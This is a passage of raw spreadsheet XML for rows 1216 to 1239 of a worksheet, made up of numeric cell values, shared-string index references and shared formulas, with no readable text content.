        <v>66</v>
      </c>
      <c r="Q1216" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1216" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1216" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="1">
        <v>16621.0</v>
      </c>
      <c r="B1217" s="2" t="s">
        <v>5241</v>
      </c>
      <c r="C1217" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1217" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1217" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1217" s="1" t="s">
        <v>5188</v>
      </c>
      <c r="G1217" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1217" s="1" t="s">
        <v>5242</v>
      </c>
      <c r="I1217" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1217" s="1" t="s">
        <v>5243</v>
      </c>
      <c r="K1217" s="2" t="s">
        <v>3754</v>
      </c>
      <c r="L1217" s="1">
        <v>3.0</v>
      </c>
      <c r="M1217" s="1">
        <v>6.0</v>
      </c>
      <c r="N1217" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1217" s="1" t="s">
        <v>5244</v>
      </c>
      <c r="P1217" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1217" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1217" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1217" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="1">
        <v>16627.0</v>
      </c>
      <c r="B1218" s="2" t="s">
        <v>5241</v>
      </c>
      <c r="C1218" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1218" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1218" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1218" s="1" t="s">
        <v>5188</v>
      </c>
      <c r="G1218" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1218" s="1" t="s">
        <v>5245</v>
      </c>
      <c r="I1218" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1218" s="1" t="s">
        <v>5246</v>
      </c>
      <c r="K1218" s="2" t="s">
        <v>5247</v>
      </c>
      <c r="L1218" s="1">
        <v>4.0</v>
      </c>
      <c r="M1218" s="1">
        <v>4.0</v>
      </c>
      <c r="N1218" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1218" s="1" t="s">
        <v>5248</v>
      </c>
      <c r="P1218" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1218" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1218" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1218" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="1">
        <v>16628.0</v>
      </c>
      <c r="B1219" s="2" t="s">
        <v>5249</v>
      </c>
      <c r="C1219" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1219" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1219" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1219" s="1" t="s">
        <v>1455</v>
      </c>
      <c r="G1219" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1219" s="1" t="s">
        <v>5250</v>
      </c>
      <c r="I1219" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1219" s="1" t="s">
        <v>5246</v>
      </c>
      <c r="K1219" s="2" t="s">
        <v>5247</v>
      </c>
      <c r="L1219" s="1">
        <v>4.0</v>
      </c>
      <c r="M1219" s="1">
        <v>4.0</v>
      </c>
      <c r="N1219" s="1" t="s">
        <v>1629</v>
      </c>
      <c r="O1219" s="1" t="s">
        <v>5248</v>
      </c>
      <c r="P1219" s="1" t="s">
        <v>5251</v>
      </c>
      <c r="Q1219" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1219" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1219" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="1">
        <v>16629.0</v>
      </c>
      <c r="B1220" s="7" t="s">
        <v>5252</v>
      </c>
      <c r="C1220" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1220" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1220" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1220" s="1" t="s">
        <v>5253</v>
      </c>
      <c r="G1220" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1220" s="1" t="s">
        <v>5254</v>
      </c>
      <c r="I1220" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1220" s="1" t="s">
        <v>5246</v>
      </c>
      <c r="K1220" s="2" t="s">
        <v>5247</v>
      </c>
      <c r="L1220" s="1">
        <v>4.0</v>
      </c>
      <c r="M1220" s="1">
        <v>4.0</v>
      </c>
      <c r="N1220" s="1" t="s">
        <v>5255</v>
      </c>
      <c r="O1220" s="1" t="s">
        <v>5248</v>
      </c>
      <c r="P1220" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1220" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1220" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1220" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="1">
        <v>16630.0</v>
      </c>
      <c r="B1221" s="2" t="s">
        <v>5256</v>
      </c>
      <c r="C1221" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1221" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1221" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1221" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1221" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1221" s="1" t="s">
        <v>5257</v>
      </c>
      <c r="I1221" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1221" s="1" t="s">
        <v>5246</v>
      </c>
      <c r="K1221" s="2" t="s">
        <v>5247</v>
      </c>
      <c r="L1221" s="1">
        <v>4.0</v>
      </c>
      <c r="M1221" s="1">
        <v>4.0</v>
      </c>
      <c r="N1221" s="1" t="s">
        <v>5258</v>
      </c>
      <c r="O1221" s="1" t="s">
        <v>5248</v>
      </c>
      <c r="P1221" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1221" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1221" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1221" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="1">
        <v>16631.0</v>
      </c>
      <c r="B1222" s="2" t="s">
        <v>5259</v>
      </c>
      <c r="C1222" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1222" s="2" t="s">
        <v>5037</v>
      </c>
      <c r="E1222" s="8" t="s">
        <v>4919</v>
      </c>
      <c r="F1222" s="1" t="s">
        <v>5260</v>
      </c>
      <c r="G1222" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1222" s="1" t="s">
        <v>5261</v>
      </c>
      <c r="I1222" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1222" s="1" t="s">
        <v>5262</v>
      </c>
      <c r="K1222" s="2" t="s">
        <v>5263</v>
      </c>
      <c r="L1222" s="1">
        <v>1.0</v>
      </c>
      <c r="M1222" s="1">
        <v>1.0</v>
      </c>
      <c r="N1222" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1222" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1222" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1222" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1222" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S1222" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="1">
        <v>16632.0</v>
      </c>
      <c r="B1223" s="2" t="s">
        <v>5264</v>
      </c>
      <c r="C1223" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1223" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1223" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1223" s="1" t="s">
        <v>5265</v>
      </c>
      <c r="G1223" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1223" s="4">
        <v>44236.14097222222</v>
      </c>
      <c r="I1223" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1223" s="1" t="s">
        <v>5266</v>
      </c>
      <c r="K1223" s="2" t="s">
        <v>5267</v>
      </c>
      <c r="L1223" s="1">
        <v>3.0</v>
      </c>
      <c r="M1223" s="1">
        <v>3.0</v>
      </c>
      <c r="N1223" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1223" s="1" t="s">
        <v>5268</v>
      </c>
      <c r="P1223" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1223" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1223" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1223" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" s="1">
        <v>16643.0</v>
      </c>
      <c r="B1224" s="2" t="s">
        <v>5269</v>
      </c>
      <c r="C1224" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1224" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1224" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1224" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G1224" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1224" s="1" t="s">
        <v>5270</v>
      </c>
      <c r="I1224" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1224" s="1" t="s">
        <v>5271</v>
      </c>
      <c r="K1224" s="2" t="s">
        <v>5272</v>
      </c>
      <c r="L1224" s="1">
        <v>4.0</v>
      </c>
      <c r="M1224" s="1">
        <v>9.0</v>
      </c>
      <c r="N1224" s="1" t="s">
        <v>5273</v>
      </c>
      <c r="O1224" s="1" t="s">
        <v>5274</v>
      </c>
      <c r="P1224" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1224" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1224" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1224" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1225">
      <c r="A1225" s="1">
        <v>16648.0</v>
      </c>
      <c r="B1225" s="2" t="s">
        <v>5275</v>
      </c>
      <c r="C1225" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1225" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1225" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1225" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G1225" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1225" s="1" t="s">
        <v>5276</v>
      </c>
      <c r="I1225" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1225" s="1" t="s">
        <v>5277</v>
      </c>
      <c r="K1225" s="2" t="s">
        <v>5278</v>
      </c>
      <c r="L1225" s="1">
        <v>5.0</v>
      </c>
      <c r="M1225" s="1">
        <v>9.0</v>
      </c>
      <c r="N1225" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O1225" s="1" t="s">
        <v>5279</v>
      </c>
      <c r="P1225" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1225" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1225" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1225" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="1">
        <v>16649.0</v>
      </c>
      <c r="B1226" s="2" t="s">
        <v>5280</v>
      </c>
      <c r="C1226" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1226" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1226" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1226" s="1" t="s">
        <v>5281</v>
      </c>
      <c r="G1226" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1226" s="1" t="s">
        <v>5282</v>
      </c>
      <c r="I1226" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J1226" s="1" t="s">
        <v>5277</v>
      </c>
      <c r="K1226" s="2" t="s">
        <v>5278</v>
      </c>
      <c r="L1226" s="1">
        <v>5.0</v>
      </c>
      <c r="M1226" s="1">
        <v>9.0</v>
      </c>
      <c r="N1226" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1226" s="1" t="s">
        <v>5279</v>
      </c>
      <c r="P1226" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1226" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1226" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1226" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="1">
        <v>16653.0</v>
      </c>
      <c r="B1227" s="2" t="s">
        <v>5283</v>
      </c>
      <c r="C1227" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1227" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1227" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1227" s="1" t="s">
        <v>5284</v>
      </c>
      <c r="G1227" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1227" s="1" t="s">
        <v>5285</v>
      </c>
      <c r="I1227" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1227" s="1" t="s">
        <v>5286</v>
      </c>
      <c r="K1227" s="2" t="s">
        <v>5287</v>
      </c>
      <c r="L1227" s="1">
        <v>7.0</v>
      </c>
      <c r="M1227" s="1">
        <v>8.0</v>
      </c>
      <c r="N1227" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1227" s="1" t="s">
        <v>5288</v>
      </c>
      <c r="P1227" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1227" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1227" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1227" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="1">
        <v>16654.0</v>
      </c>
      <c r="B1228" s="2" t="s">
        <v>5289</v>
      </c>
      <c r="C1228" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1228" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1228" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1228" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G1228" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1228" s="1" t="s">
        <v>5290</v>
      </c>
      <c r="I1228" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1228" s="1" t="s">
        <v>5286</v>
      </c>
      <c r="K1228" s="2" t="s">
        <v>5287</v>
      </c>
      <c r="L1228" s="1">
        <v>7.0</v>
      </c>
      <c r="M1228" s="1">
        <v>8.0</v>
      </c>
      <c r="N1228" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O1228" s="1" t="s">
        <v>5288</v>
      </c>
      <c r="P1228" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1228" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1228" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1228" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="1">
        <v>16655.0</v>
      </c>
      <c r="B1229" s="2" t="s">
        <v>5291</v>
      </c>
      <c r="C1229" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1229" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1229" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1229" s="1" t="s">
        <v>5292</v>
      </c>
      <c r="G1229" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1229" s="1" t="s">
        <v>5293</v>
      </c>
      <c r="I1229" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1229" s="1" t="s">
        <v>5286</v>
      </c>
      <c r="K1229" s="2" t="s">
        <v>5287</v>
      </c>
      <c r="L1229" s="1">
        <v>7.0</v>
      </c>
      <c r="M1229" s="1">
        <v>8.0</v>
      </c>
      <c r="N1229" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O1229" s="1" t="s">
        <v>5288</v>
      </c>
      <c r="P1229" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1229" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1229" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1229" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="1">
        <v>16659.0</v>
      </c>
      <c r="B1230" s="2" t="s">
        <v>5294</v>
      </c>
      <c r="C1230" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1230" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1230" s="2" t="s">
        <v>5295</v>
      </c>
      <c r="F1230" s="1" t="s">
        <v>4666</v>
      </c>
      <c r="G1230" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1230" s="4">
        <v>44809.64166666667</v>
      </c>
      <c r="I1230" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1230" s="1" t="s">
        <v>5286</v>
      </c>
      <c r="K1230" s="2" t="s">
        <v>5287</v>
      </c>
      <c r="L1230" s="1">
        <v>7.0</v>
      </c>
      <c r="M1230" s="1">
        <v>8.0</v>
      </c>
      <c r="N1230" s="1" t="s">
        <v>5296</v>
      </c>
      <c r="O1230" s="1" t="s">
        <v>5288</v>
      </c>
      <c r="P1230" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1230" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1230" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1230" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="1">
        <v>16661.0</v>
      </c>
      <c r="B1231" s="2" t="s">
        <v>5297</v>
      </c>
      <c r="C1231" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1231" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1231" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1231" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1231" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1231" s="1" t="s">
        <v>5298</v>
      </c>
      <c r="I1231" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1231" s="1" t="s">
        <v>5299</v>
      </c>
      <c r="K1231" s="2" t="s">
        <v>5300</v>
      </c>
      <c r="L1231" s="1">
        <v>3.0</v>
      </c>
      <c r="M1231" s="1">
        <v>4.0</v>
      </c>
      <c r="N1231" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1231" s="1" t="s">
        <v>5301</v>
      </c>
      <c r="P1231" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1231" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1231" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1231" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="1">
        <v>16662.0</v>
      </c>
      <c r="B1232" s="2" t="s">
        <v>5302</v>
      </c>
      <c r="C1232" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1232" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1232" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1232" s="1" t="s">
        <v>5303</v>
      </c>
      <c r="G1232" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1232" s="1" t="s">
        <v>5304</v>
      </c>
      <c r="I1232" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1232" s="1" t="s">
        <v>5299</v>
      </c>
      <c r="K1232" s="2" t="s">
        <v>5300</v>
      </c>
      <c r="L1232" s="1">
        <v>3.0</v>
      </c>
      <c r="M1232" s="1">
        <v>4.0</v>
      </c>
      <c r="N1232" s="1" t="s">
        <v>4069</v>
      </c>
      <c r="O1232" s="1" t="s">
        <v>5301</v>
      </c>
      <c r="P1232" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1232" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1232" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1232" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="1">
        <v>16663.0</v>
      </c>
      <c r="B1233" s="2" t="s">
        <v>5305</v>
      </c>
      <c r="C1233" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1233" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1233" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1233" s="1" t="s">
        <v>4939</v>
      </c>
      <c r="G1233" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1233" s="1" t="s">
        <v>5306</v>
      </c>
      <c r="I1233" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1233" s="1" t="s">
        <v>5299</v>
      </c>
      <c r="K1233" s="2" t="s">
        <v>5300</v>
      </c>
      <c r="L1233" s="1">
        <v>3.0</v>
      </c>
      <c r="M1233" s="1">
        <v>4.0</v>
      </c>
      <c r="N1233" s="1" t="s">
        <v>5307</v>
      </c>
      <c r="O1233" s="1" t="s">
        <v>5301</v>
      </c>
      <c r="P1233" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1233" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1233" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1233" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="1">
        <v>16664.0</v>
      </c>
      <c r="B1234" s="2" t="s">
        <v>5308</v>
      </c>
      <c r="C1234" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1234" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1234" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1234" s="1" t="s">
        <v>5309</v>
      </c>
      <c r="G1234" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1234" s="1" t="s">
        <v>5310</v>
      </c>
      <c r="I1234" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1234" s="1" t="s">
        <v>5299</v>
      </c>
      <c r="K1234" s="2" t="s">
        <v>5300</v>
      </c>
      <c r="L1234" s="1">
        <v>3.0</v>
      </c>
      <c r="M1234" s="1">
        <v>4.0</v>
      </c>
      <c r="N1234" s="1" t="s">
        <v>5311</v>
      </c>
      <c r="O1234" s="1" t="s">
        <v>5301</v>
      </c>
      <c r="P1234" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1234" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1234" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1234" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="1">
        <v>16736.0</v>
      </c>
      <c r="B1235" s="2" t="s">
        <v>5312</v>
      </c>
      <c r="C1235" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1235" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1235" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1235" s="1" t="s">
        <v>459</v>
      </c>
      <c r="G1235" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1235" s="4">
        <v>44291.063888888886</v>
      </c>
      <c r="I1235" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1235" s="1" t="s">
        <v>5313</v>
      </c>
      <c r="K1235" s="2" t="s">
        <v>5314</v>
      </c>
      <c r="L1235" s="1">
        <v>5.0</v>
      </c>
      <c r="M1235" s="1">
        <v>9.0</v>
      </c>
      <c r="N1235" s="1" t="s">
        <v>1844</v>
      </c>
      <c r="O1235" s="1" t="s">
        <v>5315</v>
      </c>
      <c r="P1235" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1235" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1235" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1235" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="1">
        <v>16742.0</v>
      </c>
      <c r="B1236" s="2" t="s">
        <v>5316</v>
      </c>
      <c r="C1236" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1236" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1236" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1236" s="1" t="s">
        <v>321</v>
      </c>
      <c r="G1236" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1236" s="1" t="s">
        <v>5317</v>
      </c>
      <c r="I1236" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J1236" s="1" t="s">
        <v>5318</v>
      </c>
      <c r="K1236" s="2" t="s">
        <v>5319</v>
      </c>
      <c r="L1236" s="1">
        <v>5.0</v>
      </c>
      <c r="M1236" s="1">
        <v>7.0</v>
      </c>
      <c r="N1236" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1236" s="1" t="s">
        <v>5320</v>
      </c>
      <c r="P1236" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1236" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1236" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1236" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="1">
        <v>16744.0</v>
      </c>
      <c r="B1237" s="2" t="s">
        <v>5321</v>
      </c>
      <c r="C1237" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1237" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1237" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1237" s="1" t="s">
        <v>2255</v>
      </c>
      <c r="G1237" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1237" s="4">
        <v>44538.447916666664</v>
      </c>
      <c r="I1237" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J1237" s="1" t="s">
        <v>5318</v>
      </c>
      <c r="K1237" s="2" t="s">
        <v>5319</v>
      </c>
      <c r="L1237" s="1">
        <v>5.0</v>
      </c>
      <c r="M1237" s="1">
        <v>7.0</v>
      </c>
      <c r="N1237" s="1" t="s">
        <v>5322</v>
      </c>
      <c r="O1237" s="1" t="s">
        <v>5320</v>
      </c>
      <c r="P1237" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1237" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1237" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1237" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="1">
        <v>16786.0</v>
      </c>
      <c r="B1238" s="2" t="s">
        <v>5323</v>
      </c>
      <c r="C1238" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1238" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1238" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1238" s="1" t="s">
        <v>283</v>
      </c>
      <c r="G1238" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1238" s="1" t="s">
        <v>5324</v>
      </c>
      <c r="I1238" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J1238" s="1" t="s">
        <v>5325</v>
      </c>
      <c r="K1238" s="2" t="s">
        <v>5326</v>
      </c>
      <c r="L1238" s="1">
        <v>6.0</v>
      </c>
      <c r="M1238" s="1">
        <v>14.0</v>
      </c>
      <c r="N1238" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O1238" s="1" t="s">
        <v>5327</v>
      </c>
      <c r="P1238" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1238" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1238" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1238" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="1">
        <v>16794.0</v>
      </c>
      <c r="B1239" s="2" t="s">
        <v>5328</v>
      </c>
      <c r="C1239" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1239" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1239" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1239" s="1" t="s">
        <v>5329</v>
      </c>
      <c r="G1239" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1239" s="1" t="s">
        <v>5330</v>
      </c>
      <c r="I1239" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J1239" s="1" t="s">
        <v>5331</v>
      </c>
      <c r="K1239" s="2" t="s">
        <v>5332</v>
